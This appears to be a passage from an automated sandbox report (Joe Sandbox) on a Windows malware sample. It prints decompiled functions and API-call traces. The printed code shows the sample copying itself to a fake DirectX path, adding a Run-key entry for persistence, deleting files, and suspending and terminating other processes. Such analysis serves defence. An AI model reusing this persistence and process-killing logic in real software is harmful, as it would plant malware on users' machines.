      • Part of subcall function 03004BA2: TlsGetValue.KERNEL32(?,03004CDE,?,03003EAA,03002BF3), ref: 03004BAB
      • Part of subcall function 03004BA2: DecodePointer.KERNEL32(?,03004CDE,?,03003EAA,03002BF3), ref: 03004BBD
      • Part of subcall function 03004BA2: TlsSetValue.KERNEL32(00000000,?,03004CDE,?,03003EAA,03002BF3), ref: 03004BCC
    • SetLastError.KERNEL32(00000000,?,03003EAA,03002BF3), ref: 03004D35
      • Part of subcall function 03006933: Sleep.KERNEL32(00000000,03002BF3), ref: 0300695B
    • DecodePointer.KERNEL32(00000000,?,03003EAA,03002BF3), ref: 03004D07
    • GetCurrentThreadId.KERNEL32(?,03003EAA,03002BF3), ref: 03004D1D
      • Part of subcall function 03006891: HeapFree.KERNEL32(00000000,00000000), ref: 030068A7
      • Part of subcall function 03006891: GetLastError.KERNEL32(00000000,?,03004D31,00000000,?,03003EAA,03002BF3), ref: 030068B9
      • Part of subcall function 03004C13: GetModuleHandleW.KERNEL32(KERNEL32.DLL,03009848,00000008,03004D1B,00000000,00000000,?,03003EAA,03002BF3), ref: 03004C24
      • Part of subcall function 03004C13: InterlockedIncrement.KERNEL32(0300B450), ref: 03004C65
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 91%
    			E03004C13(void* __ebx, void* __edi, void* __esi, void* __eflags) {
    				intOrPtr _t26;
    				intOrPtr _t30;
    				intOrPtr _t39;
    				void* _t40;
    
    				_t31 = __ebx;
    				_push(8);
    				_push(0x3009848);
    				E03005030(__ebx, __edi, __esi);
    				GetModuleHandleW(L"KERNEL32.DLL");
    				_t39 =  *((intOrPtr*)(_t40 + 8));
    				 *((intOrPtr*)(_t39 + 0x5c)) = 0x3001c10;
    				 *(_t39 + 8) =  *(_t39 + 8) & 0x00000000;
    				 *((intOrPtr*)(_t39 + 0x14)) = 1;
    				 *((intOrPtr*)(_t39 + 0x70)) = 1;
    				 *((char*)(_t39 + 0xc8)) = 0x43;
    				 *((char*)(_t39 + 0x14b)) = 0x43;
    				 *(_t39 + 0x68) = 0x300b450;
    				E03006E8E(__ebx, 1, 0xd);
    				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
    				InterlockedIncrement( *(_t39 + 0x68));
    				 *(_t40 - 4) = 0xfffffffe;
    				E03004CB5();
    				E03006E8E(_t31, 1, 0xc);
    				 *(_t40 - 4) = 1;
    				_t26 =  *((intOrPtr*)(_t40 + 0xc));
    				 *((intOrPtr*)(_t39 + 0x6c)) = _t26;
    				if(_t26 == 0) {
    					_t30 =  *0x300bbb8; // 0x300bae0
    					 *((intOrPtr*)(_t39 + 0x6c)) = _t30;
    				}
    				E03006558( *((intOrPtr*)(_t39 + 0x6c)));
    				 *(_t40 - 4) = 0xfffffffe;
    				return E03005075(E03004CBE());
    			}








    APIs
    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,03009848,00000008,03004D1B,00000000,00000000,?,03003EAA,03002BF3), ref: 03004C24
      • Part of subcall function 03006E8E: __amsg_exit.LIBCMT ref: 03006EB0
      • Part of subcall function 03006E8E: EnterCriticalSection.KERNEL32(?,?,?,03004C5D,0000000D), ref: 03006EB8
    • InterlockedIncrement.KERNEL32(0300B450), ref: 03004C65
      • Part of subcall function 03006558: InterlockedIncrement.KERNEL32(?), ref: 0300656A
      • Part of subcall function 03006558: InterlockedIncrement.KERNEL32(?), ref: 03006577
      • Part of subcall function 03006558: InterlockedIncrement.KERNEL32(?), ref: 03006584
      • Part of subcall function 03006558: InterlockedIncrement.KERNEL32(?), ref: 03006591
      • Part of subcall function 03006558: InterlockedIncrement.KERNEL32(?), ref: 0300659E
      • Part of subcall function 03006558: InterlockedIncrement.KERNEL32(?), ref: 030065BA
      • Part of subcall function 03006558: InterlockedIncrement.KERNEL32(00000000), ref: 030065CA
      • Part of subcall function 03006558: InterlockedIncrement.KERNEL32(?), ref: 030065E0
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd

    Execution Graph

    Execution Coverage:1.4%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:6.6%
    Total number of Nodes:622
    Total number of Limit Nodes:5

    Graph


    Executed Functions

    C-Code - Quality: 65%
    			E00404FC0(intOrPtr __eax) {
    				intOrPtr _v8;
    				void* _v12;
    				char _v15;
    				char _v17;
    				char _v18;
    				char _v22;
    				int _v28;
    				char _v289;
    				long _t44;
    				long _t61;
    				long _t63;
    				CHAR* _t70;
    				CHAR* _t72;
    				struct HINSTANCE__* _t78;
    				struct HINSTANCE__* _t84;
    				char* _t94;
    				void* _t95;
    				intOrPtr _t99;
    				struct HINSTANCE__* _t107;
    				void* _t110;
    				void* _t112;
    				intOrPtr _t113;
    
    				_t110 = _t112;
    				_t113 = _t112 + 0xfffffee0;
    				_v8 = __eax;
    				GetModuleFileNameA(0,  &_v289, 0x105);
    				_v22 = 0;
    				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
    				if(_t44 == 0) {
    					L3:
    					_push(_t110);
    					_push(0x4050c5);
    					_push( *[fs:eax]);
    					 *[fs:eax] = _t113;
    					_v28 = 5;
    					E00404E08( &_v289, 0x105);
    					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E0040522C, 0, 0,  &_v22,  &_v28) != 0) {
    						_v22 = 0;
    					}
    					_v18 = 0;
    					_pop(_t99);
    					 *[fs:eax] = _t99;
    					_push(E004050CC);
    					return RegCloseKey(_v12);
    				} else {
    					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
    					if(_t61 == 0) {
    						goto L3;
    					} else {
    						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
    						if(_t63 != 0) {
    							_push(0x105);
    							_push(_v8);
    							_push( &_v289);
    							L00401248();
    							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
    							_t107 = 0;
    							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
    								_t70 =  &_v289;
    								_push(_t70);
    								L00401250();
    								_t94 = _t70 +  &_v289;
    								while( *_t94 != 0x2e && _t94 !=  &_v289) {
    									_t94 = _t94 - 1;
    								}
    								_t72 =  &_v289;
    								if(_t94 != _t72) {
    									_t95 = _t94 + 1;
    									if(_v22 != 0) {
    										_push(0x105 - _t95 - _t72);
    										_push( &_v22);
    										_push(_t95);
    										L00401248();
    										_t107 = LoadLibraryExA( &_v289, 0, 2);
    									}
    									if(_t107 == 0 && _v17 != 0) {
    										_push(0x105 - _t95 -  &_v289);
    										_push( &_v17);
    										_push(_t95);
    										L00401248();
    										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
    										_t107 = _t78;
    										if(_t107 == 0) {
    											_v15 = 0;
    											_push(0x105 - _t95 -  &_v289);
    											_push( &_v17);
    											_push(_t95);
    											L00401248();
    											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
    											_t107 = _t84;
    										}
    									}
    								}
    							}
    							return _t107;
    						} else {
    							goto L3;
    						}
    					}
    				}
    			}


























    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404E08: GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
      • Part of subcall function 00404E08: GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
      • Part of subcall function 00404E08: FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
      • Part of subcall function 00404E08: FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
    • RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
    • RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 61%
    			E004050CC() {
    				void* _t28;
    				void* _t30;
    				struct HINSTANCE__* _t36;
    				struct HINSTANCE__* _t42;
    				char* _t51;
    				void* _t52;
    				struct HINSTANCE__* _t59;
    				void* _t61;
    
    				_push(0x105);
    				_push( *((intOrPtr*)(_t61 - 4)));
    				_push(_t61 - 0x11d);
    				L00401248();
    				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
    				_t59 = 0;
    				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
    					L14:
    					return _t59;
    				} else {
    					_t28 = _t61 - 0x11d;
    					_push(_t28);
    					L00401250();
    					_t51 = _t28 + _t61 - 0x11d;
    					L5:
    					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
    						_t51 = _t51 - 1;
    						goto L5;
    					}
    					_t30 = _t61 - 0x11d;
    					if(_t51 != _t30) {
    						_t52 = _t51 + 1;
    						if( *((char*)(_t61 - 0x12)) != 0) {
    							_push(0x105 - _t52 - _t30);
    							_push(_t61 - 0x12);
    							_push(_t52);
    							L00401248();
    							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
    						}
    						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
    							_push(0x105 - _t52 - _t61 - 0x11d);
    							_push(_t61 - 0xd);
    							_push(_t52);
    							L00401248();
    							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
    							_t59 = _t36;
    							if(_t59 == 0) {
    								 *((char*)(_t61 - 0xb)) = 0;
    								_push(0x105 - _t52 - _t61 - 0x11d);
    								_push(_t61 - 0xd);
    								_push(_t52);
    								L00401248();
    								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
    								_t59 = _t42;
    							}
    						}
    					}
    					goto L14;
    				}
    			}












    APIs
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 33%
    			E00418750(void* __ebx, void* __edi, void* __esi) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				char _v28;
    				char _v32;
    				char _v36;
    				char _v40;
    				char _v44;
    				intOrPtr _v48;
    				char _v52;
    				int _v56;
    				char _v60;
    				char _v64;
    				char _v68;
    				char _v72;
    				char* _t52;
    				void* _t80;
    				char* _t87;
    				char* _t99;
    				void* _t109;
    				void* _t110;
    				intOrPtr _t116;
    				intOrPtr _t117;
    				void* _t125;
    				intOrPtr _t139;
    				intOrPtr _t140;
    
    				_t137 = __esi;
    				_t136 = __edi;
    				_t139 = _t140;
    				_t110 = 8;
    				do {
    					_push(0);
    					_push(0);
    					_t110 = _t110 - 1;
    				} while (_t110 != 0);
    				_push(_t110);
    				_push(__ebx);
    				_push(__esi);
    				_push(__edi);
    				_push(_t139);
    				_push(0x418974);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t140;
    				if(E00402944(__ebx, __esi) == 0) {
    					E004029A4(0,  &_v12);
    					ShellExecuteA(0, 0, E00404348(_v12), 0x418984, 0, 0); // executed
    					E00403D1C();
    				}
    				_push(_t139);
    				_push(0x418925);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t140;
    				E004029A4(1,  &_v16);
    				_t109 = E00407138(_v16, 0);
    				_t144 = _t109 - 0x10;
    				if(_t109 == 0x10) {
    					E00417D84("%appdata%\\Microsoft\\DirectX\\nthost.exe", _t109, _t110,  &_v8, _t136, _t137, _t144);
    					E004186D0(_v8, _t109, _t110, _t144);
    					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v24);
    					E00417D84(_v24, _t109, _t110,  &_v20, _t136, _t137, _t144);
    					_push(_v20);
    					E00406EFC("DX9 C++RTL",  &_v28);
    					_pop(_t125);
    					E004185E8(_v28, _t109, _t125);
    					E004029A4(0,  &_v36);
    					E00406EFC(_v36,  &_v32);
    					_push(_v32);
    					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v44);
    					E00417D84(_v44, _t109, _t110,  &_v40, _t136, _t137, 0);
    					_pop(_t80);
    					E00404294(_t80, _v40);
    					if(0 == 0) {
    						__eflags = 1;
    						E00406FFC( &_v60);
    						_t87 = E00404348(_v60);
    						ShellExecuteA(0, 0, E00404348(_v8), _t87, 0, 1);
    					} else {
    						_push(1);
    						_push(0);
    						E00406FFC( &_v52);
    						_push(_v52);
    						_push(" DEL \"");
    						E004029A4(0,  &_v56);
    						E00404208();
    						_t99 = E00404348(_v48);
    						ShellExecuteA(0, 0, E00404348(_v8), _t99, E004189E4, _v56);
    					}
    					E00403D1C();
    				}
    				if(_t109 < 0x20) {
    					E00406FFC( &_v64);
    					_t52 = E00404348(_v64);
    					E004029A4(0,  &_v68);
    					ShellExecuteA(0, 0, E00404348(_v68), _t52, 0, 1);
    					E00403D1C();
    				}
    				_pop(_t116);
    				 *[fs:eax] = _t116;
    				_pop(_t117);
    				 *[fs:eax] = _t117;
    				_push(E0041897B);
    				return E00403EAC( &_v72, 0x11);
    			}
































    APIs
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00403D1C: FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
      • Part of subcall function 00403D1C: ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000,00418925,?,00000000), ref: 00417DAA
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000), ref: 00417DCB
      • Part of subcall function 004186D0: CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00418723
      • Part of subcall function 004185E8: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
      • Part of subcall function 004185E8: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
      • Part of subcall function 004185E8: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 68%
    			E004019B0() {
    				void* _t11;
    				signed int _t13;
    				intOrPtr _t19;
    				void* _t20;
    				intOrPtr _t23;
    
    				_push(_t23);
    				_push(E00401A66);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t23;
    				_push(0x4545c4);
    				L00401304();
    				if( *0x454045 != 0) {
    					_push(0x4545c4);
    					L0040130C();
    				}
    				E00401374(0x4545e4);
    				E00401374(0x4545f4);
    				E00401374(0x454620);
    				_t11 = LocalAlloc(0, 0xff8); // executed
    				 *0x45461c = _t11;
    				if( *0x45461c != 0) {
    					_t13 = 3;
    					do {
    						_t20 =  *0x45461c; // 0x0
    						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
    						_t13 = _t13 + 1;
    					} while (_t13 != 0x401);
    					 *((intOrPtr*)(0x454608)) = 0x454604;
    					 *0x454604 = 0x454604;
    					 *0x454610 = 0x454604;
    					 *0x4545bc = 1;
    				}
    				_pop(_t19);
    				 *[fs:eax] = _t19;
    				_push(E00401A6D);
    				if( *0x454045 != 0) {
    					_push(0x4545c4);
    					L00401314();
    					return 0;
    				}
    				return 0;
    			}









    APIs
    • RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
    • RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
    • LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 85%
    			_entry_() {
    				char _v24;
    				char _v28;
    				void* _t17;
    				void* _t21;
    				void* _t32;
    				void* _t33;
    				void* _t38;
    				void* _t39;
    				intOrPtr _t41;
    				void* _t42;
    
    				_v28 = 0;
    				_v24 = 0;
    				E00405ADC(0x418be0);
    				_push(0x418d7b);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t41;
    				_push(_t40);
    				_push(0x418d4a);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t41;
    				_t42 = E00402944(_t32, _t39) - 2;
    				if(_t42 > 0) {
    					E004029A4(2,  &_v24);
    					E00404294(_v24, 0x418d94);
    					if(_t42 == 0) {
    						E004029A4(3,  &_v28);
    						DeleteFileA(E00404348(_v28)); // executed
    					}
    				}
    				E00418750(_t32, _t38, _t39); // executed
    				E00418A14(_t32, _t38, _t39);
    				E00418540(_t33);
    				E00418B90(_t33);
    				while(1) {
    					L4:
    					E004189E8();
    					Sleep(0x32);
    					_t17 = E00418570();
    					_t43 = _t17;
    					if(_t17 == 0) {
    						continue;
    					}
    					L5:
    					E00418590(_t43);
    					while(E00418570() != 0) {
    						E004189E8();
    						Sleep(0x32);
    					}
    					_t21 =  *0x454a64; // 0x0
    					ResumeThread(_t21);
    					do {
    						goto L4;
    					} while (_t17 == 0);
    					goto L5;
    					L4:
    					E004189E8();
    					Sleep(0x32);
    					_t17 = E00418570();
    					_t43 = _t17;
    				}
    			}














    APIs
      • Part of subcall function 00405ADC: GetModuleHandleA.KERNEL32(00000000,?,00418C93), ref: 00405AE8
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • DeleteFileA.KERNEL32(00000000,00000000,00418D4A,?,00000000,00418D7B), ref: 00418CEB
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
      • Part of subcall function 004189E8: PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000001), ref: 004189FA
      • Part of subcall function 004189E8: TranslateMessage.USER32 ref: 00418A04
      • Part of subcall function 004189E8: DispatchMessageA.USER32 ref: 00418A0A
    • Sleep.KERNEL32(00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D0B
      • Part of subcall function 00418590: SuspendThread.KERNEL32(00000000,00000000,004185B9,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185AA
      • Part of subcall function 00418590: OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185D8
      • Part of subcall function 00418590: TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000), ref: 004185DE
    • Sleep.KERNEL32(00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D27
    • ResumeThread.KERNEL32(00000000,00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D3B
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 68%
    			E00417974(void* __eax) {
    				void* _t3;
    
    				_push(0x454880);
    				_push(0x101); // executed
    				L0040C510(); // executed
    				if(__eax != 0) {
    					_t3 = E0040A56C("WSAStartup", 1);
    					E0040386C();
    					return _t3;
    				}
    				return __eax;
